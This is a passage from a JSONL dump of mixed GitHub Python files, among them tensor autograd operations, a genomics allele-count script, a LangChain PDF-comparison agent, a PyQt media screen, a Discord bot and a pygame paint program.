-2)\n input_grad_b = a.data.swapaxes(-1, -2) @ output_grad\n \n return (input_grad_a, input_grad_b)\n \n \nclass TensorTranspose(Operation):\n \"\"\"f(inputs) = inputs[0].T\"\"\"\n \n def __init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.T)\n \n \n def _backward(self,\n output_grad: np.array):\n return (output_grad.T,)\n \n \nclass TensorMaskedFill(Operation):\n \n def __init__(self,\n inputs: List[Tensor],\n mask: Tensor,\n fill_value: float):\n \"\"\"Returns Tensor with masked values replaced with fill_value.\n \n Parameters\n ----------\n inputs\n Single Tensor.\n mask\n Tensor of 1s and 0s, must be broadcastable with inputs[0].\n 1 to fill with fill_value, 0 to leave as-is.\n fill_value\n Value to fill.\n \n \"\"\"\n super().__init__(inputs)\n if not np.all(np.isclose(mask.data, 0) | np.isclose(mask.data, 1)):\n raise ValueError('mask must be a Tensor with only 0s and 1s.')\n self.broadcasted_mask = np.broadcast_to(mask.data, self.inputs[0].shape)\n self.fill_value = fill_value\n\n \n def _forward(self):\n assert len(self.inputs) == 1\n \n return tensor.Tensor((1 - self.broadcasted_mask) * self.inputs[0].data + self.broadcasted_mask * self.fill_value)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad * (1 - self.broadcasted_mask)\n \n return (input_grad,)\n \n \nclass TensorConcatenation(Operation):\n \"\"\"f(inputs) = np.concatenate(*inputs[0], axis=axis)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: int = 0):\n super().__init__(inputs)\n self.axis = axis\n \n \n def _forward(self):\n return tensor.Tensor(np.concatenate([tensor.data for tensor in self.inputs], axis=self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n input_lengths_along_axis = [i.shape[self.axis] for i in self.inputs]\n indices_or_sections = np.cumsum(input_lengths_along_axis)[:-1]\n\n input_grads = tuple(np.split(output_grad, indices_or_sections, axis=self.axis))\n\n return input_grads\n \n \nclass TensorClone(Operation):\n \"\"\"f(inputs) = inputs[0].copy()\"\"\"\n \n def __init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.copy())\n \n \n def _backward(self,\n output_grad: np.array):\n return (output_grad,)\n \n \nclass TensorRepeatInterleave(Operation):\n \"\"\"f(inputs) = np.repeat(inputs[0], repeats, axis)\"\"\"\n\n def __init__(self,\n inputs: List[Tensor],\n repeats: int,\n axis: int):\n super().__init__(inputs)\n assert type(repeats) is int\n assert axis is None or type(axis) is int\n self.repeats = repeats\n \n if axis is not None:\n dim = len(self.inputs[0].shape)\n axis = (axis + dim) % dim\n self.axis = axis\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.repeat(self.repeats, self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n orig_shape = self.inputs[0].shape\n \n if self.axis is None:\n input_grad = output_grad.reshape(orig_shape + (self.repeats,)).sum(axis=-1)\n else:\n shape = (orig_shape[:self.axis]\n + (orig_shape[self.axis], self.repeats)\n + orig_shape[self.axis + 1:])\n\n input_grad = output_grad.reshape(shape).sum(axis=self.axis + 1)\n\n return (input_grad,)\n \n \nclass TensorFlip(Operation):\n \"\"\"f(inputs) = np.flip(inputs[0].T\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: int = None):\n super().__init__(inputs)\n self.axis = axis\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(np.flip(self.inputs[0].data, axis=self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n return (np.flip(output_grad, axis=self.axis),)\n\n\nclass TopKOperation(Operation):\n \"\"\"(weights, indices) = topk(inputs[0], k, axis)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n k: int,\n axis: int = -1):\n super().__init__(inputs)\n assert k >= 1\n self.k = k\n self.axis = axis\n self._indices = None # Populated during forward()\n\n \n def _forward(self):\n assert len(self.inputs) == 1\n x = self.inputs[0].data\n x = x.swapaxes(self.axis, -1)\n \n argsort = np.argsort(-x, axis=-1)\n indices = argsort.take(range(self.k), axis=-1)\n \n onehot_bool = np.eye(x.shape[-1]).astype(bool)\n \n weights = []\n for i in range(self.k):\n idx = indices.take(i, axis=-1)\n bool_mask = onehot_bool[idx]\n top_i = x[bool_mask].reshape(idx.shape)\n weights.append(np.expand_dims(top_i, axis=-1))\n \n weights = np.concatenate(weights, axis=-1).swapaxes(-1, self.axis)\n \n self._indices = tensor.Tensor(indices.swapaxes(-1, self.axis)).astype(int)\n \n return tensor.Tensor(weights)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = np.zeros_like(self.inputs[0].data)\n input_grad = np.moveaxis(input_grad, self.axis, -1)\n output_grad = np.moveaxis(output_grad, self.axis, 0)\n indices = np.moveaxis(self._indices.data, self.axis, 0)\n \n onehot_bool = np.eye(input_grad.shape[-1]).astype(bool)\n for i in range(self.k):\n bool_mask = onehot_bool[indices[i]]\n input_grad[bool_mask] = output_grad[i].flatten()\n \n input_grad = np.moveaxis(input_grad, -1, self.axis)\n \n return (input_grad,)\n","repo_name":"johnma2006/candle","sub_path":"candle/operations/tensorops.py","file_name":"tensorops.py","file_ext":"py","file_size_in_byte":15679,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"70069712564","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage: ./compute_allele_counts.py \n\"\"\"\n\nimport vcf\nimport sys\n\ntry:\n vcffile = sys.argv[1]\n parentfile = sys.argv[2]\nexcept:\n sys.stderr(__doc__)\n sys.exit(1)\n\nparents = [line.strip() for line in open(parentfile, \"r\").readlines()]\n\ndef GetEnclReads(sample):\n enclreads = {}\n encl = sample[\"ENCLREADS\"]\n if encl == \"NULL\": return {}\n for item in encl.split(\"|\"):\n al, count = item.split(\",\")\n enclreads[int(al)] = int(count)\n return enclreads\n\ndef FilterCall(sample):\n enclreads = GetEnclReads(sample)\n # Check has at least 10 enclosing reads\n if sum(enclreads.values()) < 10: return True\n # Check each allele supported by >=3 reads\n a1, a2 = [int(item) for item in sample[\"REPCN\"]]\n if enclreads.get(a1, 0) < 3: return True\n if enclreads.get(a2, 0) < 3: return True\n # Check >= 90% of enclosing reads match gt\n badreads = 0\n for a in enclreads.keys():\n if a != a1 and a != a2: badreads += enclreads[a]\n if badreads*1.0/sum(enclreads.values()) > 0.1: return True\n return False\n\nreader = vcf.Reader(open(vcffile, \"rb\"))\nfor record in reader:\n allele_counts = {} # allele->count\n for sample in record:\n if not sample.called: continue\n if not sample.sample in parents: continue\n if FilterCall(sample):\n continue\n gt = sample[\"REPCN\"]\n for a in gt:\n a = int(a)\n allele_counts[a] = allele_counts.get(a, 0) + 1\n for a in allele_counts:\n items = [record.CHROM, record.POS, a, allele_counts[a]]\n sys.stdout.write(\"\\t\".join([str(item) for item in items])+\"\\n\")\n","repo_name":"gymreklab/ssc-denovos-paper","sub_path":"scripts/compute_allele_counts.py","file_name":"compute_allele_counts.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"73712520241","text":"import os\nimport cv2\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset \nfrom skimage.transform import resize\n\ndef get_dataframe(path):\n videos = []\n labels = []\n for folder in os.listdir(path):\n fd = path + folder + '/'\n for video in os.listdir(fd):\n vd = os.path.join(fd, video)\n i = 1 if folder == 'fights' else 0\n videos.append(vd)\n labels.append(i)\n data_dict = {\n 'videos': videos,\n 'labels': labels \n }\n dataframe = pd.DataFrame(data=data_dict)\n return dataframe\n\ndef capture(filename, timesep, rgb, h, w):\n tmp = []\n frames = np.zeros((timesep, rgb, h, w), dtype=float)\n i=0\n vc = cv2.VideoCapture(filename)\n if vc.isOpened():\n rval , frame = vc.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n else:\n rval = False\n frm = resize(frame, (h, w, rgb))\n frm = np.expand_dims(frm, axis=0)\n frm = np.moveaxis(frm, -1, 1)\n if(np.max(frm) > 1):\n frm = frm / 255.0\n frames[i][:] = frm\n i += 1\n while i < timesep:\n tmp[:] = frm[:]\n rval, frame = vc.read()\n frm = resize(frame,( h, w, rgb))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frm = np.expand_dims(frm, axis=0)\n if(np.max(frm) > 1):\n frm = frm / 255.0\n frm = np.moveaxis(frm, -1, 1)\n frames[i-1][:] = frm\n i +=1\n return frames.astype(np.float32)\n\nclass VideoDataset(Dataset):\n def __init__(self, datas, timesep=40, rgb=3, h=160, w=160):\n self.dataloctions = datas\n self.timesep, self.rgb, self.h, self.w = timesep, rgb, h, w\n\n def __len__(self):\n return len(self.dataloctions)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n video = capture(self.dataloctions.iloc[idx, 0], self.timesep, self.rgb, self.h, self.w)\n sample = {'video': torch.from_numpy(video), 'label': torch.from_numpy(np.asarray(np.float32(self.dataloctions.iloc[idx, 1])))}\n return sample","repo_name":"crisvarai/video_class_fight","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17956416301","text":"from pydantic import BaseModel, Field\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.agents import Tool\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.chains import RetrievalQA\nfrom langchain.agents import initialize_agent\nfrom langchain.agents import AgentType\nimport os\n\n# Create a custom input schema\nclass DocumentInput(BaseModel):\n question: str = Field()\n\n# Set OpenAI API key as environment variable\nos.environ[\"OPENAI_API_KEY\"] = \"YOUR_OPENAI_API_KEY\"\n\n# List of files you want to compare\nfiles = [\n {\n \"name\": \"Volkswagen-earnings-Q1-2023\",\n \"path\": \"files/Volkswagen-Q1_2023.pdf\"\n },\n {\n \"name\": \"tesla-earning-Q1-2023\",\n \"path\": \"files/TSLA-Q1-2023-Update.pdf\"\n },\n]\n\n# Initialize a list of tools\ntools = []\n\n# Initialize the LLM\nllm = ChatOpenAI(temperature=0, model=\"gpt-3.5-turbo-0613\")\n\n# Loop over the files\nfor file in files:\n # Load the documents\n loader = PyPDFLoader(file[\"path\"])\n pages = loader.load_and_split()\n\n # Split the documents into chunks\n text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n docs = text_splitter.split_documents(pages)\n print(f\"Loaded {len(docs)} documents from {file['name']}\")\n\n # Vectorize the documents and create a retriever\n embeddings = OpenAIEmbeddings()\n retriever = FAISS.from_documents(docs, embeddings).as_retriever()\n \n # Wrap retrievers in a Tool\n tools.append(\n Tool(\n args_schema=DocumentInput,\n name=file[\"name\"], \n description=f\"useful when you want to answer questions about {file['name']}\",\n func=RetrievalQA.from_chain_type(llm=llm, retriever=retriever)\n )\n )\n\n# Initialize LLM for the agent\nllm = ChatOpenAI(\n temperature=0,\n model=\"gpt-3.5-turbo-0613\", \n)\n\n# Initialize the agent\nagent = initialize_agent(\n agent=AgentType.OPENAI_FUNCTIONS,\n tools=tools,\n llm=llm,\n verbose=True,\n)\n\n# Initialize the question variable\nquestion = \"\"\n\n# Run a loop to ask questions\nwhile True and question != \"exit\":\n question = input(\"Ask a question or write exit to quit: \")\n if question == \"exit\":\n break\n answer = agent({\"input\": question})\n print(answer[\"output\"])\n print(\"------\")","repo_name":"JorisdeJong123/7-Days-of-LangChain","sub_path":"day_6/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"75"} +{"seq_id":"8875000510","text":"## Utility functions to help main.py\n\nfrom push_net_model import *\n\nimport numpy as np\nimport os\nimport time\nimport logging\nfrom colorama import Fore\n\nimport config as args\nfrom img_utils import * \n\n''' Dimension of input image'''\nW = args.image_resolution[\"width\"]#128.0 ##!!!! Important to make it float to prevent integer division becomes zeros\nH = args.image_resolution[\"height\"]#106.0\n\n''' Mode of Goal Configuration Specification'''\n#MODE = args.mode[\"position\"] ## uncomment this line if you only care how to re-position an object\n#MODE = args.mode[\"rotation\"] ## uncomment this line if you only care how to re-orient an object\nMODE = args.mode[\"reconfigure\"]## uncomment this line if care both re-position and re-orient an object\n\n''' Method for comparison '''\nMETHOD = args.method[\"with_COM\"]#'simcom' ## Original Push-Net\n#METHOD = args.method[\"without_COM\"]#'sim' ## Push-Net without estimating COM\n#METHOD = args.method[\"without_memory\"]#'nomem' ## Push-Net without LSTM\n\n''' visualization options '''\nCURR_VIS = True # display current image\nNEXT_VIS = True # display target image\nSAMPLE_VIS = False # display all sampled actions\nBEST_VIS = True # display the best action\nSAMPLE_ACTIONS =True\nNUM_ACTION_EXECUTE =5\n\nlogging.basicConfig(format='%(asctime)s %(message)s',filename='pushnet.log', filemode='w', level=logging.INFO)\nprint('\\033[1m'+f\"Input image size {128} 'X' {106}\" +'\\033[1m')\nprint('\\033[1m' + \"Input image size %.2f MB\"%1.1 +'\\033[1m')\n\n\ndef to_var(x, volatile=False):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x, volatile=volatile)\n\n'''deep neural network predictor'''\nclass Predictor:\n def __init__(self):\n self.bs = args.batch_size\n model_path = args.model_path#'./model'\n best_model_name = args.arch[METHOD] + '.pth.tar'\n self.model_path = os.path.join(model_path, best_model_name)\n self.model = self.build_model()\n #calculate time to initialize the model\n start = time.time()\n self.load_model()\n end =time.time()\n time_elapsed = float(end -start)\n logging.info(\"Time taken to intilize the model: %.2f ms\"% time_elapsed*1000)\n\n def load_model(self):\n try:\n\n self.model.load_state_dict(torch.load(self.model_path)['state_dict'])\n if torch.cuda.is_available():\n self.model.cuda()\n self.model.eval()\n except FileNotFoundError:\n print(Fore.RED+'\\033[1m' +\"Model file not found. Check the path variable and filename. EXITING.....\" + \"\\033[0m\")\n exit()\n\n def build_model(self):\n if METHOD == 'simcom':\n return COM_net_sim(self.bs)\n elif METHOD == 'sim':\n return COM_net_sim_only(self.bs)\n elif METHOD == 'nomem':\n return COM_net_nomem(self.bs)\n\n def reset_model(self):\n ''' reset the hidden state of LSTM before pushing another new object '''\n self.model.hidden = self.model.init_hidden()\n\n def update(self, start, end, img_curr, img_goal):\n ''' update LSTM states after an action has been executed'''\n\n bs = self.bs\n A1 = []\n I1 = []\n Ig = []\n for i in range(bs):\n a1 = [[start[0]/W, start[1]/H, end[0]/W, end[1]/H]]\n i1 = [img_curr]\n ig = [img_goal]\n A1.append(a1)\n I1.append(i1)\n Ig.append(ig)\n\n A1 = torch.from_numpy(np.array(A1)).float()\n I1 = torch.from_numpy(np.array(I1)).float().div(255)\n Ig = torch.from_numpy(np.array(Ig)).float().div(255)\n\n A1 = to_var(A1)\n I1 = to_var(I1)\n Ig = to_var(Ig)\n\n if METHOD == 'simcom':\n sim_out, com_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n elif METHOD == 'sim':\n sim_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n elif METHOD == 'nomem':\n sim_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n\n def evaluate_action(self, img_curr, img_goal, actions):\n ''' calculate the similarity score of actions '''\n bs = self.bs\n A1 = []\n I1 = []\n Ig = []\n\n for i in range(bs):\n a1 = [[actions[4*i]/W, actions[4*i+1]/H, actions[4*i+2]/W, actions[4*i+3]/H]]\n i1 = [img_curr]\n ig = [img_goal]\n A1.append(a1)\n I1.append(i1)\n Ig.append(ig)\n\n A1 = torch.from_numpy(np.array(A1)).float()\n I1 = torch.from_numpy(np.array(I1)).float().div(255)\n Ig = torch.from_numpy(np.array(Ig)).float().div(255)\n\n A1 = to_var(A1)\n I1 = to_var(I1)\n Ig = to_var(Ig)\n\n sim_out = None\n com_out = None\n\n if METHOD == 'simcom':\n sim_out, com_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n elif METHOD == 'sim':\n sim_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n elif METHOD == 'nomem':\n sim_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n\n sim_np = sim_out.data.cpu().data.numpy()\n\n if MODE == 'wxy':\n sim_sum = np.sum(sim_np, 1) # measure (w ,x, y)\n elif MODE == 'xy':\n sim_sum = np.sum(sim_np[:,1:], 1) # measure (x, y)\n else:\n sim_sum = sim_np[:, 0] # measure (w)\n\n action_value = []\n for ii in range(len(sim_sum)):\n s = [actions[4 * ii], actions[4 * ii + 1]]\n e = [actions[4 * ii + 2], actions[4 * ii + 3]]\n action_value.append([[s, e], sim_sum[ii]])\n\n return action_value\n\n","repo_name":"MlLearnerAkash/Push-Net","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38569991283","text":"from ex115.lib.interface import *\nfrom ex115.lib.arquivo import *\nfrom time import sleep\n\narq = 'cursoemvideo.txt'\n\n#if arquivoExiste(arq):\n# print('Arquivo encontrado com sucesso')\n#else:\n# print('Arquivo não encontrado')\n# criarArquivo(arq)\n\nif not arquivoExiste(arq):\n criarArquivo(arq)\n\nwhile True:\n resposta = menu(['Listar Pessoas Cadastradas', 'Cadastrar Nova Pessoa', 'Sair'])\n if resposta == 1: # Opção de listar conteúdo de um arquivo\n lerArquivo(arq)\n elif resposta == 2: # Opção para adicionar dados\n cabeçalho('NOVO CADASTRO')\n nome = str(input('Nome: '))\n idade = leiaInt('Idade: ')\n cadastrar(arq, nome, idade)\n elif resposta == 3:\n cabeçalho('\\033[36mSaindo do Sistema! Até Logo!\\033[m')\n break\n else:\n print('\\033[31mERRO! Digite uma opção válida!\\033[m')\n\n\n\n","repo_name":"EvandroMauricioSI/Aprendendo-Python","sub_path":"CursoEmVídeo/CeV-Python3 Mundo3 Desafios/ex115/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33711194924","text":"from magma import *\nfrom magma.passes.clock import drive_undriven_other_clock_types_in_inst\nfrom mantle import Mux\nfrom .register import _RegisterName, Register\n\n__all__ = ['DefinePIPO', 'PIPO']\n\ndef DefinePIPO(n, init=0, has_ce=False, has_reset=False):\n \"\"\"\n Generate Parallel-In, Parallel-Out shift register.\n\n SI : In(Bit), PI : In(Bits(n)), LOAD : Bit, O : Out(Bits(n))\n \"\"\"\n\n T = Bits[ n ]\n class _PIPO(Circuit):\n name = _RegisterName('PIPO', n, init, has_ce, has_reset)\n IO = ['SI', In(Bit), 'PI', In(T), 'LOAD', In(Bit),\n 'O', Out(T)] + ClockInterface(has_ce,has_reset)\n @classmethod\n def definition(pipo):\n def mux2(y):\n return curry(Mux(2), prefix='I')\n\n mux = braid(col(mux2, n), forkargs=['S'])\n reg = Register(n, init=init, has_ce=has_ce, has_reset=has_reset)\n\n #si = array([pipo.SI] + [reg.O[i] for i in range(n-1)])\n si = concat(array(pipo.SI),reg.O[0:n-1])\n mux(si, pipo.PI, pipo.LOAD)\n reg(mux)\n wire(reg.O, pipo.O)\n drive_undriven_other_clock_types_in_inst(pipo, reg)\n\n return _PIPO\n\ndef PIPO(n, init=0, has_ce=False, has_reset=False, **kwargs):\n return DefinePIPO(n, init, has_ce, has_reset)(**kwargs)\n\n","repo_name":"bbPeng98/DSE-framework-of-PRAD","sub_path":"MetaMapper/MetaMapper/src/mantle/mantle/common/pipo.py","file_name":"pipo.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"314896115","text":"import pygame\nimport sys\nfrom pygame.locals import *\nimport random\nimport math\nimport datetime\n\n# いろをいくつか定義\ncolors = ((0, 0, 0), #黒\n (255, 0, 0), #赤\n (0, 255, 0), #みどり\n (0, 0, 255), #青\n (255, 255, 255) #白\n )\n\n#最初のペンキのいろ\ncolor = 0\n\n#一個の箱の大きさ(ピクセル)\nblock_size = 20\n#箱の数(一辺) \nmatrix_size = 30\n\n# 最初は全部白にする (白は4)\nmtrx = [[4] * matrix_size for i in range(matrix_size)]\n\n# 箱を全部書いていく\ndef draw():\n for i in range(matrix_size):\n for j in range(matrix_size):\n val = mtrx[j][i]\n pygame.draw.rect(screen,colors[val],[i * block_size, j * block_size, block_size,block_size], 0)\n\npygame.init()\nscreen = pygame.display.set_mode([block_size * matrix_size, block_size * matrix_size])\npygame.display.set_caption(\"Miura Paint\")\n \ndone = False\nclock = pygame.time.Clock()\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n #イベント処理\n had_event = False\n for event in pygame.event.get():\n had_event = True\n\n #画面を閉じるボタン\n if event.type == QUIT:\n pygame.quit()\n \n #キーが押されたとき\n if event.type == KEYDOWN:\n #終了\n if event.key == K_q or event.key == K_ESCAPE:\n pygame.quit()\n #色の切り替え 1 ~ 5 までのの色\n if event.key == K_1:\n color = 0\n if event.key == K_2:\n color = 1\n if event.key == K_3:\n color = 2\n if event.key == K_4:\n color = 3\n if event.key == K_5:\n color = 4\n # s で保存\n if event.key == K_s:\n dt = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n filename = \"screenshot_\" + dt + \".jpg\"\n pygame.image.save(screen ,filename)\n print(filename, \"で保存しました。\") \n\n #クリックで描く\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n col = math.floor(pos[0] / block_size)\n row = math.floor(pos[1] / block_size)\n mtrx[row][col] = color\n\n #マウスののボタンを押した状態でマウスを動かして、描く\n if event.type == pygame.MOUSEMOTION:\n if pygame.mouse.get_pressed()[0]: \n pos = pygame.mouse.get_pos()\n col = math.floor(pos[0] / block_size)\n row = math.floor(pos[1] / block_size)\n mtrx[row][col] = color\n \n draw()\n pygame.display.flip()\n clock.tick(20) \npygame.quit()\n","repo_name":"hypotize/mcc1","sub_path":"code/python/paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72719991921","text":"from typing import Optional\n\nfrom PyQt6.QtCore import QModelIndex, Qt\nfrom PyQt6.QtWidgets import QFrame, QHBoxLayout, QScrollArea, QSizePolicy, QVBoxLayout\nfrom PyQt6.QtWidgets import QWidget\n\nfrom ...screen import QScreen\nfrom ..solfilmdetailscreen import QSolFilmDetailScreen\nfrom hayai.features.sol.viewmodels import QSolHomeViewModel\nfrom hayai.features.provider.delegates.filmdelegate import QFilmDelegate\nfrom hayai.features.widgets.rowview import QRowView\n\n\nclass QSolHomeScreen(QScreen):\n\n def __init__(self, parent: Optional[QWidget] = None ) -> None:\n super().__init__(parent=parent)\n self._homeViewModel: QSolHomeViewModel = QSolHomeViewModel(self)\n\n scrollAreaFrame: QFrame = QFrame()\n\n scrollArea = QScrollArea()\n scrollArea.setObjectName(\"scroll-area\")\n scrollArea.setSizePolicy(QSizePolicy.Policy.MinimumExpanding,QSizePolicy.Policy.MinimumExpanding)\n \n scrollArea.setWidget(scrollAreaFrame)\n scrollArea.horizontalScrollBar().setEnabled(False)\n scrollArea.verticalScrollBar().setEnabled(True)\n scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded)\n scrollArea.setWidgetResizable(True)\n scrollArea.setContentsMargins(0,0,0,0)\n\n trendingMoviesRow: QRowView = QRowView(\"trending movies\",self._homeViewModel.trendingMovies,QFilmDelegate())\n trendingShowsRow: QRowView = QRowView(\"trending shows\",self._homeViewModel.trendingShows,QFilmDelegate())\n latestMoviesRow: QRowView = QRowView(\"latest movies\",self._homeViewModel.latestMovies,QFilmDelegate())\n latestShowsRow: QRowView = QRowView(\"latest shows\",self._homeViewModel.latestShows,QFilmDelegate())\n comingSoonRow: QRowView = QRowView(\"coming soon\",self._homeViewModel.comingSoon,QFilmDelegate())\n\n self.started.connect(self._homeViewModel.loadHome)\n trendingMoviesRow.itemClicked.connect(self.onFilmClicked)\n trendingShowsRow.itemClicked.connect(self.onFilmClicked)\n latestMoviesRow.itemClicked.connect(self.onFilmClicked)\n latestShowsRow.itemClicked.connect(self.onFilmClicked)\n comingSoonRow.itemClicked.connect(self.onFilmClicked)\n\n scrollAreaFrameLayout: QVBoxLayout = QVBoxLayout()\n scrollAreaFrameLayout.addWidget(trendingMoviesRow)\n scrollAreaFrameLayout.addWidget(trendingShowsRow)\n scrollAreaFrameLayout.addWidget(latestMoviesRow)\n scrollAreaFrameLayout.addWidget(latestShowsRow)\n scrollAreaFrameLayout.addWidget(comingSoonRow)\n scrollAreaFrameLayout.setContentsMargins(0,0,0,0)\n scrollAreaFrameLayout.setAlignment(Qt.AlignmentFlag.AlignTop)\n scrollAreaFrameLayout.setSpacing(0)\n scrollAreaFrame.setLayout(scrollAreaFrameLayout)\n\n homeLayout: QHBoxLayout = QHBoxLayout()\n homeLayout.addWidget(scrollArea)\n homeLayout.setContentsMargins(0,0,0,0)\n homeLayout.setSpacing(0)\n self.setLayout(homeLayout)\n\n self.setSizePolicy(QSizePolicy.Policy.Expanding,QSizePolicy.Policy.Minimum)\n self.title = \"Home\"\n\n def onFilmClicked(self,index: QModelIndex):\n filmUrl: Optional[str] = index.siblingAtColumn(1).data()\n if filmUrl is not None and self.navigation is not None:\n screen: QScreen = QSolFilmDetailScreen(filmUrl)\n self.navigation.push(screen)\n\n","repo_name":"crypto-0/hayai","sub_path":"hayai/screens/solscreen/solhomescreen/solhomescreen.py","file_name":"solhomescreen.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25186633340","text":"#Самый крутой бот для игры:D\r\n# -*- coding: utf-8 -*-\r\nimport discord\r\nimport asyncio\r\nimport ctypes\r\nfrom discord.ext import commands\r\nTOKEN = ''\r\nclass MyClient(discord.Client):\r\n def commands_for_game():\r\n up = \"Вверх\"\r\n down = \"Вниз\"\r\n right = \"Вправо\"\r\n left = \"Влево\"\r\n print(\"up: {up}\\n down:{down}\\n right{right}\\n left{left}\")\r\n async def on_ready(self):\r\n print('Logged on as {0}!'.format(self.user))\r\n\r\n async def on_message(self, message):\r\n print('Message from {0.author}: {0.content}'.format(message))\r\n comand = message.content\r\n if(comand == 'right'):\r\n await message.channel.send(\"вы выбрали идти вправо\")\r\n if(comand == 'left'):\r\n await message.channel.send(\"вы выбрали идти налево\")\r\n if(comand == 'up'):\r\n await message.channel.send(\"Вы выбрали идти вверх\")\r\n if(comand == 'down'):\r\n await message.chennel.send(\"Вы выбрали идти вниз\")\r\n if message.content.startswith(':help'):\r\n await message.channel.send('Привет,{0.author}, Список доступных команд:')\r\n await message.channel.send('up: вверх\\n down:вниз\\n right: вправо\\n left: налево(кстати не ходим)')\r\nclient = MyClient()\r\nclient.run(TOKEN)\r\n","repo_name":"OnlyM1ss/HeroBot","sub_path":"GetDisCommand.py","file_name":"GetDisCommand.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70995829683","text":"\r\n#define ClassA\r\nclass Person:\r\n\tID = 0\r\n\tage = 0\r\n\tname = \"\"\r\n\r\n\tdef __init__(myself, ID, age, name): # like constructor\r\n\t\tmyself.ID = ID\r\n\t\tmyself.age = age\r\n\t\tmyself.name = name\r\n\r\n\tdef funInfo(myself): # if using properties of class, func need self paramenter\r\n\t\tprint(\"ID: \" + str(myself.ID))\r\n\t\tprint(\"name: \" + str(myself.name))\r\n\t\tprint(\"age: \" + str(myself.age))\r\n\r\n#Using ClassA\r\n\"\"\"\r\nobjClassA1 = ClassA(4,5)\r\nobjClassA2 = ClassA(2,3)\r\nobjClassA1.x1 = 4\r\nobjClassA1.x2 = 6\r\nprint(\"objClassA1: \" +str(objClassA1.funClassA1()))\r\nprint(\"objClassA2: \" +str(objClassA2.funClassA1()))\r\n\"\"\"\r\n\r\nclass Student(Person):\r\n\tMSSV =0\r\n\tclassNum = 0\r\n\tdef __init__(self, ID, age, name, MSSV, classNum):\r\n\t\t#Person.__init__(self, ID, age, name)\r\n\t\tsuper().__init__(ID, age, name)\r\n\t\tself.MSSV = MSSV\r\n\t\tself.classNum = classNum\r\n\r\n\tdef funIntroduce(self): #self\r\n\t\tprint(\"A student MSSV: \" +str(self.MSSV))\r\n\t\tprint(\"A student classNum: \"+str(self.classNum))\r\n\r\nstd1 = Student(1,39, \"Harry\",1413091,1)\r\n\r\nstd1.funIntroduce()\r\nstd1.funInfo()\r\n\r\n\r\n#class Number\r\nclass Numbers:\r\n\tdef __iter__(self):\r\n\t\tself.a = 1\r\n\t\treturn self\r\n\r\n\tdef __next__(self):\r\n\t\tif self.a <= 10:\r\n\t\t\tx = self.a\r\n\t\t\tself.a += 1\r\n\t\t\treturn x\r\n\t\telse:\r\n\t\t\traise StopIteration\r\nclassNum = Numbers()\r\niterNum = iter(classNum) # iter an object\r\n\r\nfor i in iterNum: # it auto run in a len of iter\r\n\tif i % 3 == 0:\r\n\t print(i)\r\n\r\n### Example:\r\n## mymodule.py\r\n## In file: work.py. Import file by code:\r\n## `import mymodule`\r\n## Using alias: `import mymodule as 